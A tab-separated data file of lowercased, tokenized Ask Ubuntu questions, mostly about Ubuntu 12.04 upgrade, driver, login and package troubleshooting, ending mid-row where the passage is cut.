128514	applications are n't displayed in dash after upgrading to 12.04	i have ubuntu box that has been upgraded to ubuntu 12.04 . after the upgrade one of the users can not see applications in the dash : typing a search query does n't help : this system was previously upgraded from 10.10 to 11.04 and from 11.04 to 11.10 but no problem happened those times . i can provide more information like logs , if someone tells me where i can get it .
128515	what is the difference between `var= ... ` and `export var= ... ` ?	what is the difference in doing $ maven_opts= '' -xmx512m -xx : maxpermsize=384m '' to doing $ export maven_opts= '' -xmx512m -xx : maxpermsize=384m '' and is there any side-effect of doing either in an ssh connection ?
128517	how do i install working drivers for an intel 4500mhd ? ( 12.04 lts )	i was running ubuntu 11.10 before , today i decided to do a fresh install of 12.04 because when i tried the beta , i had graphics issues . being quite fresh to ubuntu ( although i deployed server to many machines , im familiar with the cli not the gui ) . in any case , after tinkering around and configuring 11.10 to my liking , i found the `` details '' button in `` system settings '' , in 11.10 under `` graphics '' , it listed my chipset fine , and these issues did not exist , in the 12 beta and final release , it says graphics are unknown . i have a dell latitude e5500 with 4500mhd graphics . can anyone please advise on how to get proper video drivers ? big thanks . tried : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update & & sudo apt-get upgrade sudo apt-get install mesa-utils rebooted , the video driver now display in the `` details '' window , but the same screen artifacts persist . for example , when i enter each letter of my password , and when i hit enter on the login screen , the screen flashes and flickers and stuff . when i 'm on the `` details '' and i change tabs , a bottom portion of the desktop flickers . this is really , really annoying . edit : if this is of any help , if i use ubuntu 2d , the problem disappears . something to do with opengl drivers ?
128518	disks become corrupt and un-readable when burned using brasero disk burner	whenever i insert a blank dvd or cd to burn files to it using brasero disk burner , the process goes very well until the burning is complete . after that , i am confronted with a error message : please eject the disk from `` slimtype dvd a ds8a5s '' manually . the disk could not be ejected though it needs to be removed for the current operation to continue . when i eject the disk , it shows the burning is complete , but the next time i insert the disk , it can not be read . it is neither read by ubuntu or by windows os . if i try to create bootable dvds , the computer can not boot from the dvd .
128523	does 12.04 have 24 bit 96000 sound ?	if not i will stick with the early version as it is more stable and i am very happy with it .
128524	how to list package dependencies ( reverse dependencies ) ?	in order to research what caused the installation of a given package , i 'd like to get a list of packages which depend on that package . i could n't find anything obvious in man dpkg .
128525	keyboard freezes with cursor as hand icon	i 've now experience twice on my macbook pro 6,2 with 12.04 and unity , where some combination of two or three fingers on the track-pad causes almost all keyboard input to be blocked , and the the mouse-cursor is locked in the state with the closed hand as if i were dragging on the move window icon after having done a three-finger tap . the mouse still moves , and i can do alt-tab to switch apps , but no other keyboard input is accepted , i.e . esc does n't work , and click the mouse does n't work except to activate other windows ( you ca n't select menu options etc ) . so even when the terminal window is activated , i ca n't type in it . the only way out was to reboot by holding down the power key . has anybody else experienced this ? what 's a work around ?
128526	what do i do when dist upgrade to 12.04 was interrupted in install-stage by the system being powered off ?	how do i check system state when dist upgrade was interrupted during install stage by power-off ? i just run dpkg -l | grep -v `` ^ii '' to ensure that i have no broken packages installed . at the first glance everything works but i doubt that as the upgrade dialog was just before crash at 70 % of estimated install-work ( cleaning and removing was n't even done too ) . what should i do next ? reinstall every package ? background : i just started to upgrade to 12.04 and wile installing packages the screen went blank ( but with visible mouse pointer ) . i was still able to got to a console by ctrl+alt+f1 and was still able to log in . although i could n't see any process working on dist upgrade which made me very curious , as it was still more than 1h of estimated work to do . i rebooted and system was behaving very slow . after deleting some folders like .gconf , .local , .config , etc.. login was working flawlessly again .
128545	is pptp a secure vpn-protocol ?	i will be setting up a vpn on my home server and in tutorials i 've read it says that the protocol can only be used with passwords , not key-files . to me this does n't seem very secure so i was wondering if it 's possible to tunnel pptp over ssh or something like that . basically , how do you create a secure pptp connection ? can you get vpn-like functionality just through ssh and use it instead of pptp ?
128550	i need to know how to get my wireless to work	i have a acer aspire 1800 series . switched from windows 7 to ubuntu 12.04.new to linux ; need help , please .
128553	youtube video colours inverted in 12.04	i 'm using 12.04 and have tried both nvidia drivers in the additional drivers list , but both times my youtube videos are inverted . everything was perfect in 11.10 , so i 'm not sure what the problem is . i 've tried right-clicking on the video and deselecting `` use hardware acceleration '' , but once the popup appears , i am unable to click anything in it ( i ca n't even close it ) . any advice ?
128560	gimp has vanished	i 'm a very new ubuntu user . i had someone install everything for me , including gimp but since my last update it has simply vanished . i have found some help on the subject but all tell me to install packages and i do n't know how to do that . whenever i try to run any of these commands i get some response like this : n : ignoring file 'matthaeus123-mrw-gimp-svn-oneiric.list.save.1 ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension when i type gimp into terminal , i get : the program 'gimp ' is currently not installed . you can install it by typing : sudo apt-get install gimp so i try the apt-get and this is what comes after : e : invalid operation gimp should i reinstall the whole system ? anyone can help please ? : ( update ok i have deleted the file ( yay ! ) . i got the following errors : err http : //ppa.launchpad.net oneiric/main sources 404 not found err http : //ppa.launchpad.net oneiric/main i386 packages 404 not found err http : //ppa.launchpad.net oneiric/main sources 404 not found err http : //ppa.launchpad.net oneiric/main i386 packages 404 not found and also w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ripps818/wacom/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ripps818/wacom/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found then when i try to run apt-get on gimp i get : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gimp : depends : libgegl-0.0-0 ( > = 0.1.3-2 ) but it is not going to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.30.0-0ubuntu4 is to be installed e : unable to correct problems , you have held broken packages .
128566	installing multiple jdk versions ubuntu 11.0	i am starting mobile apps development using java . i have successfully set up netbeans ide . i want to be able to use the sun wireless toolkit ( wtk 2.5.2 ) emulator to test my applications . however , when i test run my apps , the emulator is n't started . a thorough search on the internet indicated that the wtk i am using is targeted for jre 32 while the one i have in my system is the 64 bit version . the only remedy suggested was to install the jdk 32 bit version and point wtk to that version . how do i install the 32 bit version of jdk while at the same time keeping the 64 bit one ? below are my specs : 1 . intel core i3 2 . ubuntu 11.10 desktop operation system . 3. my jdk installation path ( 64 bit version ) /usr/lib/jvm/java-6-openjdk
128569	switching graphics using catalyst control center	i searched a lot on web and found that linux is not still very good enough in switching graphics ( dedicated to in-build ) . unlike windows where we can shift to dedicated graphics in run time ... https : //help.ubuntu.com/community/hybridgraphics so , i use ati radeon hd 6370m - 1gb on windows now and i switch them using `` catalyst control center '' depending upon the applications . is is possible to do the same in ubuntu linux ( 12.04 lts ) . i found that amd is offering catalyst control center for linux systems . : i still using win7 , want to clear the air before really switching to ubuntu . my laptop details : lenovo g570 amd radeon hd 6370m - 1gb graphics intel in-build graphics updated : i 've read a lot of questions on this site about hybrid graphics and how to switch them . now , i am confused and do n't know how to do . all i learned is , amd proprietary drivers manage power/ energy efficiently . can anyone give tell me how many methods are there to switch hybrid graphics with links to configure them . if possible , i wish to see them as answers . it could even become a wiki for many users !
128572	how do you install openstack ?	the announcement was made that ubuntu will now package openstack by default , at the install window , do we install openstack like you would install ubuntu cloud ? is it replacing ubuntu cloud ? i 've yet to see any official documentation talk about this release ? the following instructions are provided by openstack , but do fail at keystone installation : http : //www.hastexo.com/resources/docs/installing-openstack-essex-20121-ubuntu-1204-precise-pangolin for the moment there 's an unofficial documentation writen by emilien macchi , being contributed to the official opnestack documentation .
128574	clean install , shows only purple screen	i 've installed ubuntu 12.04 on clean pc from live mode . after reboot i can only see purple screen - no boot splash etc , ca n't access to alternative screens like ctrl+alt-f6 etc , but i can hear login prompt sound . i can access recovery mode , so i guess it 's kinda video drivers problem . but i 'd like to know any alternative suggestions . thanks .
128576	how do i correctly install ffdiaporama ( slideshow software ) on ubuntu 12.04	background i had some issues with dependencies etc and i thought it would be useful if i posted the correct solution here so other community members could benefit . i am not sure it appropriate to do this on au but there are a lot of high profiles sites out there giving incomplete information . ( this caused me some issues ) note : ffdiaporama is an open source application for creating video sequences consisting of titles , fixed or animated , images or photos , fixed or animated , movie clips & music . related question on au software to add images to video ? similar open source software kdenlive , openshot , kino
128577	ca n't mount ntfs partition	well , i have windows 8 running on another partition . i had ubuntu 11.10 and was running perfectly , i could mount the windows partition . now , it says that the partition is hibernated . but it is not . i have tried this line : mount -t ntfs-3g -o remove_hiberfile /dev/sda3 /media/9a36761b3675f89 i did n't work . any suggestions ?
128580	keepassx 0.4.3 no tray icon and not in unity launcher	i use keepassx as passwort manager and just moved from 10.04 to 12.04 with unity . i would like that keepassx uses its tray icon . unfortunally this option is greyed out in my installation . several reinstallations did not change anything . whitelist is set to [ all ] . another bug seems to be , that keepassx does not show up in the unity bar when it is running . this leads to the problem that there will be multiple instances runnig when i try to open it via the dash . any fix for that ? i could not find any !
128583	how can i completely remove ecryptfs from my system and delete .private ?	few days back i have installed ecryptfs , created a private directory using it . now my ubuntu login became super slow . i have tried removing ecryptfs from synaptic . i found it , it can not be deleted that way . somewhere i have read about this command ecryptfs-setup-private -- undo but this command displays a rather confusing list of commands on terminal . i do n't want to mess up my installation , neither want to loose my administrator account . now my question is , how can i safely remove /home/user/private ( .private ) and remove ecryptfs encryption ?
128584	upgrade from 11.10 to 12:04 failed	i upgraded from ubuntu 11.10 to 12.04 using the update manager . at the end of the upgrade the console said the upgrade had failed and it forced me to restart . after a restart i am not able to do anything other than logging in . i just see a blue screen with the ubuntu one icon , i can open applications , but nothing beyond that . i opened the terminal but after that the keyboard is not being recognized . basically the laptop is now rendered useless . any pointers on how to recover ? this is on a dell inspiron 1501 laptop with a 64 bit amd sempron processor . any help would be appreciated . thanks , sandeep
128593	how to activate or use the dictionary lens ?	i 've installed dictionary lens package from precise ppa . but i do n't see a dictionary icon at the bottom of the dash . i see the package installed in synaptic , but how to activate or use the dictionary lens ? yes , i 've logged out an back in , even more , i 've restarted the computer , but no luck so far . can someone advise ? has anyone installed dictionary lens on clean 12.04 install ? does it work for you ?
128595	flattening pdf transparency	i have a pdf , made with inkscape , that uses transparent colors . this image shall be used in a latex document . while preserving the transparency is nice for editing , it can be a problem for printing . printing usually involves pdf to ps conversion . since postscript does not support transparency , this requires either flatting , i.e . creating a vector graphic that works without transparency or rastering , i.e . rendering a bitmap image . when a pdf document containing such a figure is printed ( or converted to ps ) using evince ( or cairo or ghostscript ) , the whole page gets rendered as a bitmap , rendering fonts ugly ( different from other pages ) . ( adobe acrobat handles such pdfs well . ) unfortunately , converting the pdf figures to eps ( before including them with latex ) does n't help much , because both pdftops and pdf2ps ( again , cairo or ghostscript ) rasterize the image , i.e . render a bitmap ( saved as eps ) . ( this is slightly better , because it does n't affect the whole page , but i 'd still prefer a vector graphics . ) how can i flatten transparency with inkscape or other software on linux ?
128609	no suspend on lid closing on a samsung series 5 14 '' np530u4bi	ok , i realize i am not the only one , but i will try to provide all info possible to make it exemplary as possible and narrow down the error sources . i have a fresh install of ubuntu 12.04 and the suspend worked fine upon having it freshly installed but now it does not anymore . the suspend option from the system power button on the top right works fine . things i did do which i do n't know if they are related : install and remove againthe fglrx drivers ( radeon graphic card ) install jupiter power managment ( shutting it down is not changin anything ) plug in and out an external display the configuration i know of is well set : in system settings/power all is set to suspend when closing lid double checked with dconf-editor , everything set to suspend so , from here on i do n't know how to proceed.. what are common problems that cause this error ? edit : my computer model is : samsung series 5 14 '' np530u4bi $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6230 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller 04:00.0 usb controller [ 0c03 ] : asmedia technology inc. asm1042 superspeed usb host controller
128610	pm-powersave is called on each boot	on my ubuntu ( server ) installation i 'm tweaking some power parameters . but most of these parameters such as /sys/class/scsi_host/host0/link_power_management_policy keep getting reset . i have inspected some of my log files and it seems that pm-powersave false is executed on each boot ( from /var/log/pm-powersave.log ) how can i prevent this from executing on each boot ?
128611	bash runs executable fine in 10.04 but not in 11.10 or 12.04	first post , but i come here often and this is the first time i have n't found the answer already posted , so i registered . i have a simple binary executable that runs fine in 10.04 . ./buds opening serial device '/dev/ttys0 ' ( 19200,8n1 ) ... ok creating pty device ... ok setting pty device '/dev/pts/1 ' ( 115200,8n1 ) ... ok startup complete , waiting for commands ... but does not in 11.10 live cd or 12.04 under virtualbox : cd test ls buds ./buds bash : ./buds : no such file or directory i 've made sure that buds is executable and that i have permissions : chris @ chris-virtualbox : ~ $ ls -l buds -rwxr-xr-x 1 chris chris 26240 jun 22 2010 buds file buds buds : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , buildid [ sha1 ] =0xf8f0b93813114695c72203bdc1bcf47163553eab , stripped ldd buds not a dynamic executable yikes !
128614	volume range is narrow in 12.04	i have upgraded to ubuntu 12.04 and i have a problem with the volume . the problem is that the volume is 0 when the volume bar is between 0 % and 66 % more or less , so the actual volume range is only between 66 % and 100 % . if i open the sound configuration menu , the position in the volume bar that makes the sound begin sounding ( 66 % more or less ) is placed where it says `` no amplification '' . can anyone help me ? thank you .
128617	ubuntu one upload scheduling options ?	i was wondering if it was possible to schedule a time for one to sync files as opposed to syncing every time i move a file into one of my designated folders .
128620	system monitor detecting load averages higher in 12.04 ?	in 11.10 my load averages stayed around .06.i ve been on 12.04 precise for 3 days now and have noticed my load averages stay around 1.06 at all times.can someone tell me what is going on ? i was told that 12.04 precise was faster and efficient.anyone else experiencing this issue ? *update*i woke up this morning noticing my hdd was being accessed.i woke my computer and checked system monitor.my load averages were around 1.46 so it seems to be getting worse.this is the highest so far.i m running a quad core but i think at idle i should be like it was in 11.10,0.06 .
128621	compiz consuming lot of cpu when display is off in 12.04	i just upgraded to 12.04 this weekend , and since the upgrade , whenever the screen is turned off ( after 5 min of inactivity ) , the fan starts to run like crazy , making a lot of noise . when i get back to my computer and the screen is turned on again , it 's silent again . obviously i ca n't see what 's happening when the screen is off , but leaving top open in a terminal window , i see that compiz is taking 50+ % of cpu right after the screen is turned on again . this seems quite an excessive load for compiz , given that the screen is off : ) . it quickly goes down to about 5 % after that . there are spikes up to about 25 % during normal use , but no excessive fan whirring noise . additional info : i have a sony vaio laptop with an i5 processor and an ati radeon video card . i have installed the additional drivers for the ati card , but the problem also occurred when i had n't installed them yet . i have a dual monitor setup with my laptop screen and a separate monitor connected through vga in different resolutions . in the catalyst control center , i have set the display manger settings to `` multi-display desktop '' . i used this exact same set-up in 11.10 with no problems . also , when i upgraded to 12.04 , i did a fresh install , where i cleared the disk before installing ubuntu . ( although i left the windows partition intact . ) any idea what migth be causing this , or , more importantly , how i can fix it ? the sound of the fan when i 'm not using the computer is really annoying . ( my problem seems to be related to this one , but in my case it only happens when the display is turned off , and also it did n't happen in 11.10 , so this issue seems to be different enough to get its own question . )
128623	how can i get a manually created user to show up on the log in screen ?	i need to create a user manually ( need a specific uid and default group ) , but i would also like to be able to log in via the standard 12.04 login ( lightdm ) . i can not figure out a way to do both of these . if i created the user with the user accounts gui , i can not get the uid i want . if i create the user manually , it does not show up as an option on the log in screen .
128628	can not log in into ubuntu after an upgrade to 12.04	today i can not log into the gui , but i can use the console ( ctrl+alt+f1 ) to log in as a user or as root , and i can login via ssh . under natty , before the upgrade , i had set up ubuntu to auto-login as a user . on friday autologin was working with 12.04 . today i am presented with the login screen for the first time . i am not prompted for the user id , just for a password . $ sudo cat /var/log/lightdm/lightdm.log [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.1 , uid=0 pid=1421 [ +0.00s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for automatic login as user mslinn [ +0.00s ] debug : starting local x display [ +0.02s ] debug : x server :0 will replace plymouth [ +0.04s ] debug : using vt 7 [ +0.04s ] debug : activating vt 7 [ +0.04s ] debug : logging to /var/log/lightdm/x-0.log [ +0.04s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.04s ] debug : launching x server [ +0.04s ] debug : launching process 1452 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none [ +0.04s ] debug : waiting for ready signal from x server :0 [ +0.04s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.04s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.41s ] debug : got signal 10 from process 1452 [ +0.41s ] debug : got signal from x server :0 [ +0.41s ] debug : stopping plymouth , x server is ready [ +0.43s ] debug : connecting to xserver :0 [ +0.43s ] debug : automatically logging in user mslinn [ +0.43s ] debug : started session 1524 with service 'lightdm-autologin ' , username 'mslinn' [ +0.49s ] debug : session 1524 authentication complete with return value 0 : success [ +0.49s ] debug : autologin user mslinn authorized [ +0.49s ] debug : autologin using session xterm [ +0.50s ] debug : dropping privileges to uid 1000 [ +0.50s ] debug : restoring privileges [ +0.51s ] debug : dropping privileges to uid 1000 [ +0.51s ] debug : writing /home/mslinn/.dmrc [ +0.53s ] debug : restoring privileges [ +0.57s ] debug : starting session xterm as user mslinn [ +0.57s ] debug : session 1524 running command /usr/sbin/lightdm-session xterm [ +0.65s ] debug : new display ready , switching to it [ +0.65s ] debug : activating vt 7 [ +0.66s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 [ +0.89s ] debug : session 1524 exited with return value 0 [ +0.97s ] debug : user session quit [ +0.97s ] debug : stopping display [ +0.97s ] debug : sending signal 15 to process 1452 [ +2.20s ] debug : process 1452 exited with return value 0 [ +2.20s ] debug : x server stopped [ +2.20s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +2.20s ] debug : releasing vt 7 [ +2.20s ] debug : display server stopped [ +2.20s ] debug : display stopped [ +2.20s ] debug : active display stopped , switching to greeter [ +2.20s ] debug : switching to greeter [ +2.20s ] debug : starting new display for greeter [ +2.20s ] debug : starting local x display [ +2.20s ] debug : using vt 7 [ +2.20s ] debug : logging to /var/log/lightdm/x-0.log [ +2.21s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +2.21s ] debug : launching x server [ +2.21s ] debug : launching process 1758 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +2.21s ] debug : waiting for ready signal from x server :0 [ +2.43s ] debug : got signal 10 from process 1758 [ +2.43s ] debug : got signal from x server :0 [ +2.43s ] debug : connecting to xserver :0 [ +2.43s ] debug : starting greeter [ +2.43s ] debug : started session 1766 with service 'lightdm ' , username 'lightdm' [ +2.61s ] debug : session 1766 authentication complete with return value 0 : success [ +2.61s ] debug : greeter authorized [ +2.61s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +2.66s ] debug : session 1766 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +3.12s ] debug : greeter connected version=1.2.1 [ +3.12s ] debug : greeter connected , display is ready [ +3.12s ] debug : new display ready , switching to it [ +3.12s ] debug : activating vt 7 [ +3.12s ] debug : stopping greeter display being switched from [ +3.91s ] debug : greeter start authentication for mslinn [ +3.91s ] debug : started session 2219 with service 'lightdm ' , username 'mslinn' [ +3.99s ] debug : session 2219 got 1 message ( s ) from pam [ +3.99s ] debug : prompt greeter with 1 message ( s ) i tried deinstalling and reinstalling lightdm , but that did not help . i have 3 virtualized ubuntu systems ; two of them have this problem . what should i do ?
128629	problems with 12.04 // problemas con 12.04	tengo una acer aspire 5520-3992 , amd turion 64 , con tarjeta nvidia primeramente actualicé de 11.10 a la versión 12.04 y no funcionó correctamente . una vez que me identifico , las pantallas están totalmente negras , lo mas que logro es ver algunas carpetas pero sin os botones de cerrar , maximizar , etc . posteriormente hice una instalación de cero para ver si evitaba estos problemas y obtuve los mismos resultados , aparentemente tiene algún problema con los controladores gráficos . cualquier ayuda la agradeceré , antes de regresarme a la 11.10 con la cual no tenía problemas . gerardo granados translation : i own an acer aspire 5520-3992 , amd turion 64 , with an nvidia graphics card . i first updated from 11.10 to 12.04 and it did n't work correctly . once i have logged in , screens become absolutely blank , the most i can see is some folders but no close , maximize and other buttons . later i made a fresh install from scratch in order to see if this corrected these problems and i got the same results . apparently there is a kind of a problem with graphics drivers . any help is really appreciated , i am planning to downgrade to 11.10 on which i did n't experience any problems at all . gerardo granados
128630	sources.list error malformed line	update manager fails with this this error : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) i get the same error , when i try to start software center , ubuntu one , synaptic or similar tools .
128633	12.04 open folder as root	to open a folder as root in the nautilus you just had to install nautilus-gksu from the ubuntu repository . this nautilus extension adds an option to the nautilus called `` open as adminstrator '' . it does what it claims to do . after i updated ubuntu i ca n't find the package anymore . it 's removed from the software center . i really like this nautilus extension . how do i get this option on 12.04 ?
128636	how do i use ubuntu backup ( dejadup ) with owncloud ( webdav ) ?	i 'm trying to use ubuntu backup ( ie . dejadup ) with owncloud . i have an account with owncube and made a folder in my root called 'backup-computer1 ' where i want my backups to go . under settings in owncloud , it says webdav : https : //owncube.com/files/webdav.php then i went to ubuntu settings , backup , the storage tab , and selected webdav from the dropdown list , and entered the following settings : server : owncube.com/files/webdav.php tick `` use secure connection ( https ) '' port : 443 folder : /backup-computer1 username : myowncubeusername but it keeps telling me it ca n't find the hostname . when i entered the full webdav address ( https : //owncube.com/files/webdav.php ) it just removed it from the form . what am i doing wrong ?
128637	login returns to login screen	so , after much googling and searching this very site , i 've seem to have encountered another problem . during the upgrade , when asked to use new configuration files or keep my locally modified ones , i told the upgrade to use the new , which i believe is my mistake . i have no idea as how to undo it . this , i think , has lead to the problem of me not being able to login . i created a secondary user account , and for awhile i could login to that one , but now i can only login via gui as guest . i can ctrl alt f1 to terminal and login that way , but i can not get in via gui , no matter which desktop option i use . i 've tried sudo dpkg-reconfigure lightdm and sudo dpkg-reconfigure gdm , to no avail . i 've also tried ps ax | grep lightdm , sudo apt-get clean/purge/autoremove etc. , and sudo stop lightdm , sudo xorg -configure ( which i have no idea on what to edit ) then sudo start lightdm , which brings up an error of it not being able to start . when i do try to login , whether i have it set to automatically login , enter my password and hit enter or click on the > , it goes to a black screen with some text that appears really quick and then returns to the login screen . edit : welcome to ubuntu 12.04 lts ( gnu/linux 3.2.0-24-generic i686 ) . output of ls -l /home : total 8 dr-x -- -- -- 4 phil 4096 apr 30 15:50 phil drwxr -xr-x 25 phil2 phil2 4096 apr 30 16:40 phil2 i think this is caused because i had tried to comment out some stuff in the above file due to duplicates , and this is the first time this error has come up . output of sudo xorg -configure : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . ddxsiggiveup : closing log . i tried adding the mate desktop environment ( gnome 2.0 ) , and still can not login under my primary account or the secondary account i created . i managed to unencrypt and move my files from my encrypted home folder under my primary account , but that has n't fixed the problems either . wiping out and starting fresh really is n't an option . acer aspire one d250 model , intel atom n270 1.60 ghz , 1gb ram , and plenty of hard drive space . wiped out my backtrack 4 installation and partitions , and expanded it for use by my primary ( 12.04 lts ) .
128638	ubuntu 12.04 crashes	meanwhile i watch videos via internet suddenly screen goes black and take me back to login screen after i type my password system begins as i 've restarted my pc.all are power settings disabled from system settings . i assume from logs thats the problem . apr 30 18:53:06 desktop aptdaemon : info : quitting due to inactivity apr 30 18:53:06 desktop aptdaemon : info : quitting was requested
128648	on a dual monitor setup , how can i set which lone monitor the alt-tab interface appears ?	on a dual monitor setup , how can i set which monitor the alt-tab ( or alt+` ) interfaces appear ? right now , it 's flying all over the place , possibly based on on which app is focused ? i 'm not sure . in any case this is not useful to me . i spend 80 % of my time staring at the monitor in front of me , and sometimes i turn my head to the left to look at logs , or whatever . when i press alt-tab or alt+` , i want the interface to appear , 100 % of the time , on the monitor in front of me . geforce gt 430 , nvidia binary drivers , ubuntu 12.04 lts . help ?
128649	compiz using 8 % - 25 % cpu continually	any tips ? running intel core 2 quad x64 ubuntu precise 12.04 dell optiplex 760 nvidia graphics driver update : unfortunately i uninstalled ubuntu ... just could n't deal with the incompatibilities and issues and i needed to start being productive again ... back to windows 7 for me . : -\ update ( 4/17/2013 ) : so it sounds like this issue can be caused by a variety of different things and no 1 single answer is correct . too localized ?
128656	is there a basic guide to creating themes in burg ?	i have a basic theme idea i 'd like to create in burg . i can find some information about customizing existing themes in burg , but not a basic tutorial that shows you how to create your own unique theme . can anyone point me towards some resources ?
128657	kernel requires an x86-64 cpu , but only detected an i686 cpu . how can i install lubuntu/ubuntu ?	i 'm trying to install lubuntu on my laptop ( sorta old 2005 ) . [ laptop stats : intel速 celeron速 cpu 410 @ 1.46 ghz 1.47ghz , 448 mb of ram ] i press install and this message appears : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . what can i do to install lubuntu on my computer ?
128658	setting up virtual host	i currently have all my websites as directories under /var/www . i would like to set up a virtual host http : //foo/ that points to the /var/www/foo/foo directory ( and still keep the default localhost behavior ) . i added the following file , foo , to /etc/apache2/sites-available/ : < virtualhost *:80 > servername foo documentroot /var/www/foo/foo # other directives here < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/foo/foo > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > i then ran the following commands : sudo a2ensite foo sudo /etc/init.d/apache2 reload but when i go to http : //foo/ it still returns an isp search page .
128663	xubuntu app menu on wrong side of screen	i am using xubuntu 12.04 , with a dual monitor setup ( with the nvidia driver xinerama enabled ) . the top panel is spanned acros the two monitors . this works quite fine , except for one thing . when i click the little application menu button on my left screen , the application menu opens on the top right corner of the left screen . this is quite annoying , i fiddled in the panel prefs but could not fix this . any thoughts ?
128665	toshiba satellite l755 overheats	i really want to use the new unity and the integration options , i 'm running a toshiba satellite l755-s5349 , but , it keeps my laptop on a very high temperature , with very high peaks specially when i open the dash , it gets really hot , any suggestions ?
128672	ubuntu 12.04 home folder showing full	i received a notification today that my home folder is full . i have a 120gb ssd with 3 partitions , / , /opt , /home ( 84gb ) . using the disk usage analyzer , i can only determine that there is no more than approximately 10gb being used . i can not find the phantom directories or folders that are taking up the space . is anyone able to help me free up this space ?
128675	broken packages : after attempting to install flash	installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory dpkg : dependency problems prevent configuration of adobe-flashplugin : i386 : firefox ( 12.0+build1-0ubuntu0.12.04.1 ) breaks adobe-flashplugin ( < = 11.1.102.63-0precise1 ) and is installed . version of adobe-flashplugin : i386 to be configured is 10.0.32.18-1. dpkg : error processing adobe-flashplugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of adobe-flash-properties-gtk : i386 : adobe-flash-properties-gtk : i386 depends on adobe-flashplugin ( = 11.2.202.233-0precise1 ) ; however : version of adobe-flashplugin : i386 on system is 